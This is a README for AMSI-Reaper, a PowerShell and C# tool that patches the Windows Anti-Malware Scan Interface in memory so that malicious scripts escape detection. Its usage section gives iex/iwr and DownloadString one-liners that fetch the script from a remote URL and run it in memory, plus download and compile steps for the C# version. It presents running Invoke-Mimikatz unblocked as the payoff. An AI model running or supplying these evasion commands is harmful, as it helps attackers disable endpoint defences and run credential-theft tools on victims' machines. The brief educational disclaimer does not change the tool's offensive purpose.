AMSI-Reaper

Disclaimer ⚠️

• The AMSI-Reaper tool is designed mainly for educational and research purposes. The author is not responsible for any misuse, damage, or legal consequences caused by the use of this tool.

Overview📎

• The (AMSI) is a built-in security feature in Windows that enables applications and services to integrate with antimalware products. It automatically protects against harmful scripts and code in programs like PowerShell.
• AMSI-Reaper is a tool developed in PowerShell and C# (.NET Framework v4.0) designed to bypass the Anti-Malware Scan Interface in Windows.
• AMSI-Reaper injects code into the memory of the AMSI components, preventing them from interfering with your scripts.
• Check out more on the YouTube Video

Usage 🛠️

1️⃣ PowerShell Version

• Download

iex (iwr https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.ps1)

iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.ps1')

2️⃣ C# Version

• Download

wget https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.cs -O AMSI-Reaper.cs

iwr https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.cs -O AMSI-Reaper.cs

• Compile

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AMSI-Reaper.cs

Images 🪛

✔ Invoke-Mimikatz is detected and blocked by AMSI.

✔ With AMSI-Reaper in PowerShell, we can request and use it from the command line in real-time, all in memory.

✔ Alternatively, you can also use AMSI-Reaper in C# with native Windows features by compiling it with CSC.